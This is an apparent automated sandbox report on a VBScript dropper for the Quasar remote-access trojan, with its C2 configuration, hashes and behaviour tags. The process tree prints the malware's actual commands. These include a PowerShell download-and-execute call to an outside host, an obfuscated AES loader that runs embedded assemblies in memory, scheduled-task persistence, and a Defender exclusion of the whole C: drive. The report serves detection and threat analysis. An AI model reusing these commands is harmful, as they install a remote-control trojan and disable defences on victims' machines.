Overview

overview

10

Static

static

1

9273_output.vbs

windows7-x64

8

9273_output.vbs

windows10-2004-x64

10

9273_output.vbs

windows10-ltsc 2021-x64

10

9273_output.vbs

windows11-21h2-x64

10

Analysis

  • max time kernel
    91s
  • max time network
    96s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    09-12-2024 17:28

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    9273_output.vbs

  • Size

    1.6MB

  • MD5

    89444730511dcc04894433ad215e9f02

  • SHA1

    8af2c8469f0381666bbdfbb12965c48290ef817b

  • SHA256

    7bfbcbf1a30ba537264e189e39b2ada434fc451c99a7fe680aa6196cd931b625

  • SHA512

    121bcab2c0e4c0c307565742f03d4ebef33ba677f4591a2d95238c500c82fbeafd4d52521bdf57e0775178b081a95b877b561721ec72540b0beb4acf3548a19f

  • SSDEEP

    24576:prCPrx+7wnggpUvK3oVj1S1LYuhN0E7olLXm5ttA7AhazaJUelDBY1Qq0+BbUklh:g/rUTV40u3oli5LEgaaUKat0+BbeYz

Score
10/10
quasarsearchindexerexecutionspywaretrojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

searchindexer

C2

87.120.113.125:55644

Mutex

0c021db0-bf71-4ae4-b9ae-2671afdea591

Attributes
  • encryption_key

    54717FCDBD30C7781F669403FBC8E35733C37E34

  • install_name

    searchindexer.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    searchindexer

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar family
    quasar
  • Quasar payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell and hide display window.

    execution
  • Executes dropped EXE 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9273_output.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2672
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3920
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3784
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\u42ddkjb\u42ddkjb.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4832
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB0E1.tmp" "c:\Users\Admin\AppData\Local\Temp\u42ddkjb\CSCB4B94D97BDAD4930A34EDD783BCC59D1.TMP"
            5⤵
              PID:1184
          • C:\windows\system32\cmstp.exe
            "C:\windows\system32\cmstp.exe" /au C:\windows\temp\4yz3mvlr.inf
            4⤵
              PID:800
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2500
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function fn1($p1){ $a=[System.Security.Cryptography.Aes]::Create(); $a.Mode=[System.Security.Cryptography.CipherMode]::CBC; $a.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $a.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('r+bFNsKWcrMhhN0VNqHyPpVzm490/5Y+urqm0SsiN9g='); $a.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QFHft5W2NiDlaGOW8LKzjw=='); $d=$a.CreateDecryptor(); $r=$d.TransformFinalBlock($p1, 0, $p1.Length); $d.Dispose(); $a.Dispose(); $r;}function fn2($p2){ $m1=New-Object System.IO.MemoryStream(,$p2); $m2=New-Object System.IO.MemoryStream; $g=New-Object System.IO.Compression.GZipStream($m1, [IO.Compression.CompressionMode]::Decompress); $g.CopyTo($m2); $g.Dispose(); $m1.Dispose(); $m2.Dispose(); $m2.ToArray();}function fn3($p3, $p4){ $a1=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$p3); $e=$a1.EntryPoint; $e.Invoke($null, $p4);}$p='C:\Users\Admin\AppData\Local\Temp\c.bat';$host.UI.RawUI.WindowTitle = $p;$c=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($p).Split([Environment]::NewLine);foreach ($l in $c) { if ($l.StartsWith(':: ')) { $pl=$l.Substring(3); break; }}$pdata=[string[]]$pl.Split('\');$p1=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[0])));$p2=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[1])));fn3 $p1 $null;fn3 $p2 (,[string[]] (''));
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:804
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_514_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\latencyx514.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2880
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\latencyx514.vbs"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:384
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\latencyx514.bat" "
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:640
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function fn1($p1){ $a=[System.Security.Cryptography.Aes]::Create(); $a.Mode=[System.Security.Cryptography.CipherMode]::CBC; $a.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $a.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('r+bFNsKWcrMhhN0VNqHyPpVzm490/5Y+urqm0SsiN9g='); $a.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QFHft5W2NiDlaGOW8LKzjw=='); $d=$a.CreateDecryptor(); $r=$d.TransformFinalBlock($p1, 0, $p1.Length); $d.Dispose(); $a.Dispose(); $r;}function fn2($p2){ $m1=New-Object System.IO.MemoryStream(,$p2); $m2=New-Object System.IO.MemoryStream; $g=New-Object System.IO.Compression.GZipStream($m1, [IO.Compression.CompressionMode]::Decompress); $g.CopyTo($m2); $g.Dispose(); $m1.Dispose(); $m2.Dispose(); $m2.ToArray();}function fn3($p3, $p4){ $a1=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$p3); $e=$a1.EntryPoint; $e.Invoke($null, $p4);}$p='C:\Users\Admin\AppData\Roaming\latencyx514.bat';$host.UI.RawUI.WindowTitle = $p;$c=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($p).Split([Environment]::NewLine);foreach ($l in $c) { if ($l.StartsWith(':: ')) { $pl=$l.Substring(3); break; }}$pdata=[string[]]$pl.Split('\');$p1=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[0])));$p2=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[1])));fn3 $p1 $null;fn3 $p2 (,[string[]] (''));
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Drops file in Program Files directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  PID:1876
                  • C:\Windows\SYSTEM32\schtasks.exe
                    "schtasks" /create /tn "searchindexer" /sc ONLOGON /tr "C:\Program Files\SubDir\searchindexer.exe" /rl HIGHEST /f
                    7⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:3148
                  • C:\Program Files\SubDir\searchindexer.exe
                    "C:\Program Files\SubDir\searchindexer.exe"
                    7⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2184
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess powershell.exe
        1⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1076
      • C:\Windows\system32\taskkill.exe
        taskkill /IM cmstp.exe /F
        1⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:3032

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Program Files\SubDir\searchindexer.exe
        Filesize

        440KB

        MD5

        0e9ccd796e251916133392539572a374

        SHA1

        eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204

        SHA256

        c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221

        SHA512

        e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        2KB

        MD5

        627073ee3ca9676911bee35548eff2b8

        SHA1

        4c4b68c65e2cab9864b51167d710aa29ebdcff2e

        SHA256

        85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

        SHA512

        3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        900c7fac3ccd57351617c0b7e480dcf8

        SHA1

        262d1a39dc55644003ca46399845b0260ec83aee

        SHA256

        53250ca5ebb80432367e035099f602133ef1d97dee0147d428b6a3360cb29bdd

        SHA512

        f5786e5f38ef9ec8f5eb0e573c6c37fdbae24ae6bd04dfbed281e464d7605ab2e6acb9bb5a2fedd1c833bd101cbeadfe691b191863c67f68030cc0cd8db31999

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        81e0552d0827e0bf2d66737db6a93618

        SHA1

        cec19fc5b1ddaf567537a9c2fa43f84c0b3d4a2b

        SHA256

        a0009e1dc49436bd64750db3b642c378ca83b64b812ed3e494d0d72978384c56

        SHA512

        4972bedac6314b5e1be107ba7d0a7b4a3857f4a303ba6f7e803d1e0971f11dd5d21aa72783371c581a49ed17b4b499f8e05df8ad8af7badb65c73aa0a270148d

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\RESB0E1.tmp
        Filesize

        1KB

        MD5

        98207a61f92becd98027457b72c6d437

        SHA1

        b1c754d80becf3d5da3dd168c44562e7a5a19bf3

        SHA256

        fe7371749676b9c61c615cddf32663c8770a981dc4d3417fe80b572e47dfe4c1

        SHA512

        c836a5e503e5a45675247dc282cae7b49bc0d7cc769c6203be487168bbfab80ac638ac8c5b4d198a27475ea5b8c77bbd606e49db0a7ad37bea9fdd27012f8173

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1fsenpgb.ore.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\c.bat
        Filesize

        1.6MB

        MD5

        63a0d558702bb4b4fdad3fbe2ffc0ac9

        SHA1

        c70f2444e8052e6495c42f179785da267acac50b

        SHA256

        c3c8a913470c637c51bc84cdaaf8eb23f52556ad289d57c79e9c9cfa7bf9f757

        SHA512

        7f7819c86ac7a74694dc77b21cb54ccbfc084d98554d880323ba460dc033492718f052041f001837c5412af52aa0c29a8a30125f8413276201643d516e052f10

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\u42ddkjb\u42ddkjb.dll
        Filesize

        4KB

        MD5

        d64fcc44f020d3ffc7a3c57423423fe6

        SHA1

        1b851fd66543ce47e5c52349e9e32bc92b8cd1a1

        SHA256

        081a4b0fea0b3677c3b52c6fcc2995daee475c2ec65a410a03e15001e5866ef3

        SHA512

        4d2c1b1ff27763434c5515c3d08c3ce5882337d129e8babdc2425ee6e5bd77af67317b53d458402c297af32a938f543ab30038a7adcb49823da096f5ec007f9f

        Download Submit

      • C:\Users\Admin\AppData\Roaming\latencyx514.vbs
        Filesize

        111B

        MD5

        8eeea54360ae08e53717cef8c880a5cc

        SHA1

        0fdd3f0f052f09a11ec05e170a4eac30d371c835

        SHA256

        a8b078e48937e47e0ecb5f3f9b879c407501f093cf5cfe0006e9283bac220eed

        SHA512

        882525ecc6999d91c72a4a848bbeadfdfc91862340fadc28d8b559b54d744ccff271e4024c9ed7d6a4945bb031426172edb1f4b91e6b4af7cd8949edf54b730a

        Download Submit

      • C:\windows\temp\4yz3mvlr.inf
        Filesize

        683B

        MD5

        a4fd12b94ad4ac06fabd8dd56dd5ff2b

        SHA1

        940d129205e04ba31b10a72d7a7a236a9ed0488b

        SHA256

        fe9977d49d2ae366779da959a5c9a6cc7664bc82d7c8e243f1baa9aa539cd320

        SHA512

        a4712ad7a23ab7a1eadfdaa7dc73dc406a0a14313c0413561f2f4ba8087c79c504d1d4391585b1b91f580ffef3869a37523707979dd5ab870a596062497e79fe

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\u42ddkjb\CSCB4B94D97BDAD4930A34EDD783BCC59D1.TMP
        Filesize

        652B

        MD5

        26f044589e7aa1136674d75c28987699

        SHA1

        60ace126a7aa0081ea4d74623daec2570ef038cf

        SHA256

        34c9837b43b6f99a3c4aaa86d181ca526a31c2d43a02262fc168090a179c70f6

        SHA512

        0dd3fe115a61cb807b870db63fd399457fc23f6735cc972f6fa5e33e299776b4b8478867a9857d6d068a5b21f89b87b3100a79c514068329ea185459801b4112

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\u42ddkjb\u42ddkjb.0.cs
        Filesize

        2KB

        MD5

        897ac4306f2a2524bc3c441bd00c72b9

        SHA1

        1703dbf9a2a78491dfd6685540d4691839e33b69

        SHA256

        a889dd1616631e369d253d6d89cc3a253b663e636bb1cdebbf831817592b405b

        SHA512

        2eba96a7960fe4c8c083ffbca30dbff4c5aac6acfa2c99b6ab5802376d028cbf471c3f06fcef9a3a0129dc988df1aceba808c3436cd110c123dc2ba1147c81b6

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\u42ddkjb\u42ddkjb.cmdline
        Filesize

        369B

        MD5

        adcf183989b19fa1a7e68c3d2c1c382a

        SHA1

        e17db207141c9ace4e7f175beb2650deff7420af

        SHA256

        a7d7dcd0ab2733aa465e644630c01c45a2afa4948dd1652a64e5ed1c8a4533ea

        SHA512

        16c4938398cc1256f1a03787950fa0df81b23443f8906d1e9c178f0f3099a38ce39431a8c2ac7ffd4151d486423709195b417c1e8e45fab0394996a86410ee14

        Download Submit

      • memory/804-62-0x00000241CC470000-0x00000241CC5A2000-memory.dmp

        Filesize

        1.2MB

        Download

      • memory/804-61-0x00000241CC0A0000-0x00000241CC0A8000-memory.dmp

        Filesize

        32KB

        Download

      • memory/1876-89-0x000001E31E140000-0x000001E31E464000-memory.dmp

        Filesize

        3.1MB

        Download

      • memory/2184-103-0x00000270B9750000-0x00000270B9796000-memory.dmp

        Filesize

        280KB

        Download

      • memory/3784-26-0x0000025970E40000-0x0000025970E48000-memory.dmp

        Filesize

        32KB

        Download

      • memory/3784-47-0x00007FFDA3DE0000-0x00007FFDA48A2000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3784-43-0x00007FFDA3DE0000-0x00007FFDA48A2000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3784-42-0x00007FFDA3DE3000-0x00007FFDA3DE5000-memory.dmp

        Filesize

        8KB

        Download

      • memory/3784-0-0x00007FFDA3DE3000-0x00007FFDA3DE5000-memory.dmp

        Filesize

        8KB

        Download

      • memory/3784-13-0x0000025970E20000-0x0000025970E3C000-memory.dmp

        Filesize

        112KB

        Download

      • memory/3784-12-0x00007FFDA3DE0000-0x00007FFDA48A2000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3784-11-0x00007FFDA3DE0000-0x00007FFDA48A2000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3784-10-0x00007FFDA3DE0000-0x00007FFDA48A2000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3784-9-0x0000025970910000-0x0000025970932000-memory.dmp

        Filesize

        136KB

        Download